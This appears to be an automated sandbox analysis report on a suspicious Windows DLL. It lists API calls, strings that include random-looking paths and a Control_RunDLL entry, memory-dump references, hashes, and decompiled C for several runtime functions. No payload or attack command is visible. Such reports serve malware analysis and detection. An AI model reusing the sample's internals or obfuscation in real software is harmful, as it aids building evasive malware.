                          0x6ece20af
                          0x6ece20af
                          0x6ece22a2
                          0x6ece22a5
                          0x6ece22a5
                          0x6ece2097
                          0x6ece1fcb
                          0x6ece1fcb
                          0x6ece1fcb
                          0x6ece1fcd
                          0x6ece1fd4
                          0x00000000
                          0x6ece1fd4
                          0x6ece1f8c
                          0x6ece1f8c
                          0x6ece1f92
                          0x6ece1fe9
                          0x6ece1fe9
                          0x6ece1fee
                          0x00000000
                          0x6ece1fee
                          0x6ece1f8a
                          0x6ece1f6d
                          0x6ece1f5e
                          0x6ece1e5d
                          0x6ece1e5d
                          0x6ece1dd5
                          0x6ece1dd5
                          0x00000000
                          0x6ece1dd5
                          0x6ece1e57
                          0x6ece1e34
                          0x6ece1e20
                          0x6ece1e1c
                          0x6ece1dc6
                          0x6ece1dc6
                          0x6ece1de2
                          0x6ece1de2
                          0x6ece1de9
                          0x6ece1dec
                          0x6ece1dec
                          0x6ece1df2
                          0x6ece1df9
                          0x6ece1df9
                          0x6ece1dc4
                          0x6ece1dbd

                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6ECE1C2E,?), ref: 6ECE1DB5
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6ECE1C2E,?), ref: 6ECE1DC6
                          • GetConsoleMode.KERNEL32(00000000,?), ref: 6ECE1E08
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6ECE1E83
                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 6ECE1F05
                          Strings
                          • assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed, xrefs: 6ECE200E
                          • Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq, xrefs: 6ECE1FF5
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast$ConsoleFileHandleModeWrite
                          • String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq$assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed
                          • API String ID: 4172320683-607870617
                          • Opcode ID: 00b855beb31fa84bfdeb5c9c49275ba61a9a4221f03e0e1bf43218fe746116f0
                          • Instruction ID: c27eec18e038c83fcfd6de5e3b153aa18ce3ac79bbd236d29f780461767abd9c
                          • Opcode Fuzzy Hash: 00b855beb31fa84bfdeb5c9c49275ba61a9a4221f03e0e1bf43218fe746116f0
                          • Instruction Fuzzy Hash: 2B71D1B16083459FD7188F9AD8547AB7BE5BB86304F10882CE4E687B84E731D95CCB53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC690, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 45%
                          			E6ECDC690(void* __ebx, void* __edi, void* __esi, void* _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				long _v48;
				void* __ebp;
				void* _t22;
				void* _t29;
				void* _t30;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				void* _t54;

				_t32 = __ebx;
				_v32 = _t54 - 0x20;
				_v20 = 0xffffffff;
				_v24 = E6ECE3B40;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_v48 = 0;
				__imp__AcquireSRWLockExclusive(0x6ed2ada8, __esi, __edi, __ebx);
				_t47 =  *0x6ed2a038; // 0x1
				_t50 =  *0x6ed2a03c; // 0x0
				_v40 = 0x6ed2ada8;
				_t43 = _t47 & _t50;
				if(_t43 == 0xffffffff) {
					L8:
					_v36 = _t43;
					__imp__ReleaseSRWLockExclusive(0x6ed2ada8);
					_v20 = 0;
					_t22 = E6ECF72E0("failed to generate unique thread ID: bitspace exhausted", 0x37, 0x6ed1d270);
					goto L10;
				} else {
					 *0x6ed2a038 = _t47 + 1;
					asm("adc ecx, 0x0");
					 *0x6ed2a03c = _t50;
					if((_t47 | _t50) == 0) {
						_v36 = _t43;
						_v20 = 0;
						_t22 = E6ECF6E20(__ebx, "called `Option::unwrap()` on a `None` value", 0x2b, _t47, _t50, __eflags, 0x6ed1d280);
						L10:
						asm("ud2");
						__eflags = _v36 - 0xffffffff;
						if(_v36 != 0xffffffff) {
							E6ECDC870(_t22,  &_v40);
						}
						return E6ECDC850( &_v48);
					} else {
						__imp__ReleaseSRWLockExclusive(0x6ed2ada8);
						_t29 =  *0x6ed2adc8; // 0x760000
						if(_t29 != 0) {
							L5:
							_t30 = HeapAlloc(_t29, 0, 0x20);
							if(_t30 == 0) {
								goto L7;
							} else {
								 *(_t30 + 8) = _t47;
								 *(_t30 + 0xc) = _t50;
								 *(_t30 + 0x10) = 0;
								 *((char*)(_t30 + 0x18)) = 0;
								 *_t30 = 1;
								 *(_t30 + 4) = 1;
								 *[fs:0x0] = _v28;
								return _t30;
							}
						} else {
							_t29 = GetProcessHeap();
							if(_t29 == 0) {
								L7:
								_t43 = 8;
								E6ECF6C30(_t32, 0x20, 8, _t47, _t50, __eflags);
								asm("ud2");
								goto L8;
							} else {
								 *0x6ed2adc8 = _t29;
								goto L5;
							}
						}
					}
				}
			}


















                          0x6ecdc690
                          0x6ecdc699
                          0x6ecdc69c
                          0x6ecdc6a3
                          0x6ecdc6b4
                          0x6ecdc6b7
                          0x6ecdc6bd
                          0x6ecdc6c9
                          0x6ecdc6cf
                          0x6ecdc6d5
                          0x6ecdc6db
                          0x6ecdc6e4
                          0x6ecdc6e9
                          0x6ecdc77f
                          0x6ecdc77f
                          0x6ecdc787
                          0x6ecdc78d
                          0x6ecdc7a3
                          0x00000000
                          0x6ecdc6ef
                          0x6ecdc6f6
                          0x6ecdc6fd
                          0x6ecdc702
                          0x6ecdc708
                          0x6ecdc7ad
                          0x6ecdc7b0
                          0x6ecdc7c6
                          0x6ecdc7ce
                          0x6ecdc7ce
                          0x6ecdc7d7
                          0x6ecdc7db
                          0x6ecdc7e0
                          0x6ecdc7e0
                          0x6ecdc7f1
                          0x6ecdc70e
                          0x6ecdc713
                          0x6ecdc719
                          0x6ecdc720
                          0x6ecdc730
                          0x6ecdc735
                          0x6ecdc73c
                          0x00000000
                          0x6ecdc73e
                          0x6ecdc73e
                          0x6ecdc741
                          0x6ecdc744
                          0x6ecdc74b
                          0x6ecdc74f
                          0x6ecdc755
                          0x6ecdc75f
                          0x6ecdc76d
                          0x6ecdc76d
                          0x6ecdc722
                          0x6ecdc722
                          0x6ecdc729
                          0x6ecdc76e
                          0x6ecdc773
                          0x6ecdc778
                          0x6ecdc77d
                          0x00000000
                          0x6ecdc72b
                          0x6ecdc72b
                          0x00000000
                          0x6ecdc72b
                          0x6ecdc729
                          0x6ecdc720
                          0x6ecdc708

                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6ED2ADA8), ref: 6ECDC6C9
                          • ReleaseSRWLockExclusive.KERNEL32(6ED2ADA8), ref: 6ECDC713
                          • GetProcessHeap.KERNEL32 ref: 6ECDC722
                          • HeapAlloc.KERNEL32(00760000,00000000,00000020), ref: 6ECDC735
                          • ReleaseSRWLockExclusive.KERNEL32(6ED2ADA8), ref: 6ECDC787
                          Strings
                          • failed to generate unique thread ID: bitspace exhausted, xrefs: 6ECDC794
                          • called `Option::unwrap()` on a `None` value, xrefs: 6ECDC7B7
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
                          • String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
                          • API String ID: 1780889587-1657987152
                          • Opcode ID: f157ec2bde68b1d0481a1d77dc37dc1b62496ba93265f1db2b18e43d33e13ed1
                          • Instruction ID: bb93b36834f90fb39008c09770812a38c6f052622099af679ed277952b3e6dc7
                          • Opcode Fuzzy Hash: f157ec2bde68b1d0481a1d77dc37dc1b62496ba93265f1db2b18e43d33e13ed1
                          • Instruction Fuzzy Hash: 7631E271E006048FEB548FD4DA14B9EBBB9EF85328F114169DA24AB384E7759809CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECD10A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6ECD10A0(long __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, char _a8, intOrPtr _a16) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				long _v44;
				long _v48;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				void* __ebp;
				void* _t45;
				void* _t46;
				void* _t50;
				void* _t51;
				intOrPtr _t54;
				long _t62;
				void* _t71;
				void* _t81;
				void* _t84;
				intOrPtr _t85;

				_t78 = __esi;
				_t76 = __edi;
				_t59 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t85 = _t84 - 0x30;
				_v32 = _t85;
				_v20 = 0xffffffff;
				_v24 = E6ECE3B00;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t45 =  *0x6ed2adc8; // 0x760000
				if(_t45 != 0) {
					L3:
					_t46 = HeapAlloc(_t45, 0, 0xf);
					if(_t46 == 0) {
						goto L18;
					} else {
						asm("movsd xmm0, [0x6ed1b227]");
						asm("movsd xmm1, [0x6ed1b220]");
						_v40 = _t46;
						asm("movsd [eax+0x7], xmm0");
						asm("movsd [eax], xmm1");
						_t50 =  *0x6ed2adc8; // 0x760000
						if(_t50 != 0) {
							L7:
							_t51 = HeapAlloc(_t50, 0, 0x10);
							if(_t51 == 0) {
								goto L19;
							} else {
								asm("movsd xmm0, [0x6ed1b237]");
								asm("movsd xmm1, [0x6ed1b22f]");
								_t71 = 0;
								_t59 = 0x10;
								_v52 = _t51;
								_v48 = 0x10;
								asm("movsd [eax+0x8], xmm0");
								asm("movsd [eax], xmm1");
								while(1) {
									_v44 = _t59;
									if(_t71 > 0xf) {
										break;
									}
									_t17 = _t71 + 1; // 0x1
									_t76 = _t71 + _t17;
									_t78 = _t59 - _t76;
									if(_t78 < 0) {
										_v20 = 0;
										E6ECF6C40(_t59, _t76, _t59, _t76, _t78, __eflags);
										asm("ud2");
										goto L18;
									} else {
										if(_t59 == _v48) {
											_v36 = _t71;
											_v56 = _t78;
											_v60 = _t76;
											_v20 = 0;
											_v64 = _t59;
											E6ECF6BC0( &_v52, _t59);
											_t51 = _v52;
											_t59 = _v64;
											_t71 = _v36;
											_t76 = _v60;
											_t78 = _v56;
										}
										_t10 = _t76 + 1; // 0x1
										_v36 = _t71 + 1;
										_t81 = _t51;
										E6ECEAE10(_t51 + _t10, _t51 + _t76, _t78);
										_t71 = _v36;
										_t51 = _t81;
										_t85 = _t85 + 0xc;
										 *((char*)(_t81 + _t76)) = 0;
										_t59 = _t59 + 1;
										continue;
									}
									goto L21;
								}
								_v20 = 0;
								_v36 = _t51;
								E6ECE9770(_v40, _a4, _a8, _t51, _a16);
								__eflags = _v48;
								if(_v48 != 0) {
									HeapFree( *0x6ed2adc8, 0, _v36);
								}
								HeapFree( *0x6ed2adc8, 0, _v40);
								_t54 = _v28;
								 *[fs:0x0] = _t54;
								return _t54;
							}
						} else {
							_t50 = GetProcessHeap();
							if(_t50 == 0) {
								L19:
								_t62 = 0x10;
								goto L20;
							} else {
								 *0x6ed2adc8 = _t50;
								goto L7;
							}
						}
					}
				} else {
					_t45 = GetProcessHeap();
					if(_t45 == 0) {
						L18:
						_t62 = 0xf;
						L20:
						E6ECF6C30(_t59, _t62, 1, _t76, _t78, __eflags);
						asm("ud2");
						__eflags =  &_a8;
						E6ECD1000(_v52, _v48);
						return E6ECD1000(_v40, 0xf);
					} else {
						 *0x6ed2adc8 = _t45;
						goto L3;
					}
				}
				L21:
			}


























                          0x6ecd10a0
                          0x6ecd10a0
                          0x6ecd10a0
                          0x6ecd10a3
                          0x6ecd10a4
                          0x6ecd10a5
                          0x6ecd10a6
                          0x6ecd10a9
                          0x6ecd10ac
                          0x6ecd10b3
                          0x6ecd10c4
                          0x6ecd10c7
                          0x6ecd10cd
                          0x6ecd10d4
                          0x6ecd10e8
                          0x6ecd10ed
                          0x6ecd10f4
                          0x00000000
                          0x6ecd10fa
                          0x6ecd10fa
                          0x6ecd1102
                          0x6ecd110a
                          0x6ecd110d
                          0x6ecd1112
                          0x6ecd1116
                          0x6ecd111d
                          0x6ecd1131
                          0x6ecd1136
                          0x6ecd113d
                          0x00000000
                          0x6ecd1143
                          0x6ecd1143
                          0x6ecd114b
                          0x6ecd1153
                          0x6ecd1155
                          0x6ecd115a
                          0x6ecd115d
                          0x6ecd1164
                          0x6ecd1169
                          0x6ecd1192
                          0x6ecd1195
                          0x6ecd1198
                          0x00000000
                          0x00000000
                          0x6ecd119a
                          0x6ecd119a
                          0x6ecd11a0
                          0x6ecd11a2
                          0x6ecd1235
                          0x6ecd123c
                          0x6ecd1241
                          0x00000000
                          0x6ecd11a8
                          0x6ecd11ab
                          0x6ecd11ad
                          0x6ecd11b5
                          0x6ecd11b8
                          0x6ecd11bb
                          0x6ecd11c2
                          0x6ecd11c5
                          0x6ecd11ca
                          0x6ecd11cd
                          0x6ecd11d0
                          0x6ecd11d3
                          0x6ecd11d6
                          0x6ecd11d6
                          0x6ecd1171
                          0x6ecd1175
                          0x6ecd117e
                          0x6ecd1180
                          0x6ecd1185
                          0x6ecd1188
                          0x6ecd118a
                          0x6ecd118d
                          0x6ecd1191
                          0x00000000
                          0x6ecd1191
                          0x00000000
                          0x6ecd11a2
                          0x6ecd11db
                          0x6ecd11e5
                          0x6ecd11f2
                          0x6ecd11fa
                          0x6ecd11fe
                          0x6ecd120b
                          0x6ecd120b
                          0x6ecd121b
                          0x6ecd1220
                          0x6ecd1223
                          0x6ecd1230
                          0x6ecd1230
                          0x6ecd111f
                          0x6ecd111f
                          0x6ecd1126
                          0x6ecd124a
                          0x6ecd124a
                          0x00000000
                          0x6ecd112c
                          0x6ecd112c
                          0x00000000
                          0x6ecd112c
                          0x6ecd1126
                          0x6ecd111d
                          0x6ecd10d6
                          0x6ecd10d6
                          0x6ecd10dd
                          0x6ecd1243
                          0x6ecd1243
                          0x6ecd124f
                          0x6ecd1254
                          0x6ecd1259
                          0x6ecd1264
                          0x6ecd126d
                          0x6ecd1283
                          0x6ecd10e3
                          0x6ecd10e3
                          0x00000000
                          0x6ecd10e3
                          0x6ecd10dd
                          0x00000000

                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6ECD10D6
                          • HeapAlloc.KERNEL32(00760000,00000000,0000000F), ref: 6ECD10ED
                          • GetProcessHeap.KERNEL32(00760000,00000000,0000000F), ref: 6ECD111F
                          • HeapAlloc.KERNEL32(00760000,00000000,00000010,00760000,00000000,0000000F), ref: 6ECD1136
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,00760000,00000000,0000000F), ref: 6ECD120B
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,00760000,00000000,0000000F), ref: 6ECD121B
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocFreeProcess
                          • String ID: Control_RunDLL$Control_RunDLL
                          • API String ID: 2113670309-2490747307
                          • Opcode ID: 54b1b3c7fe46cd5e536666a4752f096958d294aaf34f52675934a197fe73d383
                          • Instruction ID: dea31941f8224420cf768093ffcbf788dff111aeb28c16c390041ead2c6769df
                          • Opcode Fuzzy Hash: 54b1b3c7fe46cd5e536666a4752f096958d294aaf34f52675934a197fe73d383
                          • Instruction Fuzzy Hash: 1151B175D00609DFDB00CFE9C840BEEB7B6FF49344F108569EA046B254E7769849CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEC860, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6ECEC897
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6ECEC89F
                          • _ValidateLocalCookies.LIBCMT ref: 6ECEC928
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6ECEC953
                          • _ValidateLocalCookies.LIBCMT ref: 6ECEC9A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 30671b1d1ddf6d949dc6219769a72a061f8e980b12d1956ae54d8f68879fd9f4
                          • Instruction ID: 35fd0a8a4cdc69e9e007a9d4ad38bd5481f5bfc799be81cd20c9e2c5c14a614b
                          • Opcode Fuzzy Hash: 30671b1d1ddf6d949dc6219769a72a061f8e980b12d1956ae54d8f68879fd9f4
                          • Instruction Fuzzy Hash: 27418F34E00249AFCF00CFA9C894E9EBFB9AF45328F108555E8285F756E7319A15CBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECE2B10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6ED2ADB4), ref: 6ECE2B44
                          • TlsAlloc.KERNEL32 ref: 6ECE2B5A
                          • GetProcessHeap.KERNEL32 ref: 6ECE2B74
                          • HeapAlloc.KERNEL32(00760000,00000000,0000000C), ref: 6ECE2B8B
                          • ReleaseSRWLockExclusive.KERNEL32(6ED2ADB4), ref: 6ECE2BC8
                          Strings
                          • assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi, xrefs: 6ECE2BE8
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocExclusiveHeapLock$AcquireProcessRelease
                          • String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi
                          • API String ID: 3228198226-2044759171
                          • Opcode ID: 78aed88853409d9c0b638f3478715511702f11f97996fccbf1215f3edec0e240
                          • Instruction ID: 4b674573b582a45f24334527fe3740e730357bd9380685bc669c0d9519d78913
                          • Opcode Fuzzy Hash: 78aed88853409d9c0b638f3478715511702f11f97996fccbf1215f3edec0e240
                          • Instruction Fuzzy Hash: E44134B190020A8FEB04CFD4D955B9EBBB5FF44318F104529E619AB790EB759849CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF1BFC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,6ECF1D09,FFFDD001,00000400,?,00000000,?,?,6ECF1E82,00000021,FlsSetValue,6ED239F8,6ED23A00,?), ref: 6ECF1CBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: 3b3306939a94bdb8341bdf45c05dd77abbcac7a208c6dd2594e6c56e27a05a59
                          • Instruction ID: c1f9ff097e0b2b3d1cd64005edc0f85ce5a432d1f7130cd69e25b3b98b0ec35c
                          • Opcode Fuzzy Hash: 3b3306939a94bdb8341bdf45c05dd77abbcac7a208c6dd2594e6c56e27a05a59
                          • Instruction Fuzzy Hash: E6212EB2A01625EFDB5147AADD54F8A3778EF433A4B100510E912A7289F770E907C6E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECECCFF, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000001,?,6ECECA41,6ECEA8E2,6ECEA0EC,?,6ECEA324,?,00000001,?,?,00000001,?,6ED27DA8,0000000C,6ECEA41D), ref: 6ECECD0D
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6ECECD1B
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6ECECD34
                          • SetLastError.KERNEL32(00000000,6ECEA324,?,00000001,?,?,00000001,?,6ED27DA8,0000000C,6ECEA41D,?,00000001,?), ref: 6ECECD86
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 22177db44986f79f02811e9185bed6e7f2ba7e8998f1d175b417a62da611934f
                          • Instruction ID: 200273ae587940ac287372cf4ad4e17dd3619dd22bcb24c98467a6e74afa442a
                          • Opcode Fuzzy Hash: 22177db44986f79f02811e9185bed6e7f2ba7e8998f1d175b417a62da611934f
                          • Instruction Fuzzy Hash: C2012433209B515EFB6016FD6C8CDC72E69EB833B83200329E62C699D4FF2299024560
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECE97A0, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6ECE9E50: GetTickCount64.KERNEL32 ref: 6ECE9E57
                          • GetTickCount64.KERNEL32 ref: 6ECE97D6
                          • GetTickCount64.KERNEL32 ref: 6ECE97F4
                          • GetTickCount64.KERNEL32 ref: 6ECE980D
                          • GetTickCount64.KERNEL32 ref: 6ECE980F
                          • GetTickCount64.KERNEL32 ref: 6ECE9816
                          • GetTickCount64.KERNEL32 ref: 6ECE9834
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Count64Tick
                          • String ID:
                          • API String ID: 1927824332-0
                          • Opcode ID: b2b9b75161159711c5a67b992637354ff35e42f5a3efd4bb5cf0169e6bd71bf1
                          • Instruction ID: d7f77e4754110b01313826b3417a3bb093ba7fcdab418cdfac1115e595e5b15d
                          • Opcode Fuzzy Hash: b2b9b75161159711c5a67b992637354ff35e42f5a3efd4bb5cf0169e6bd71bf1
                          • Instruction Fuzzy Hash: 6C018023C34A189DE203AA79A84215AA67D6FA73D8F11C353E04A37012FB9014E386A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECD6D10, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • _!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6ECD6D7A, 6ECD6DB5
                          • {invalid syntax}, xrefs: 6ECD6D54
                          • 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECD6D24
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
                          • API String ID: 3839614884-2364648981
                          • Opcode ID: 4ebce2665fd155c2f6a72185b1ff70cc58905971634ca5ca80185fb238db5266
                          • Instruction ID: 74eff8bd37c0f1c80d8fb5acebae2dbde8b0ded22689a53bd5eca577bb04d086
                          • Opcode Fuzzy Hash: 4ebce2665fd155c2f6a72185b1ff70cc58905971634ca5ca80185fb238db5266
                          • Instruction Fuzzy Hash: 98416C717186004BD3149AEDE840BAAB6D99F84744F10453DEA899F3DAF666C809C292
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDD1B0, Relevance: 8.8, APIs: 7, Instructions: 85memoryCOMMON
                          Download Yara Rule
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00000001,6ECDC906), ref: 6ECDD1BB
                          • TlsGetValue.KERNEL32(00000000,00000001,6ECDC906), ref: 6ECDD1D3
                          • TlsGetValue.KERNEL32(00000000), ref: 6ECDD1F3
                          • TlsGetValue.KERNEL32(00000000), ref: 6ECDD213
                          • GetProcessHeap.KERNEL32 ref: 6ECDD226
                          • HeapAlloc.KERNEL32(00760000,00000000,0000000C), ref: 6ECDD239
                          • TlsSetValue.KERNEL32(00000000,00000000,00760000,00000000,0000000C), ref: 6ECDD266
                          Memory Dump Source
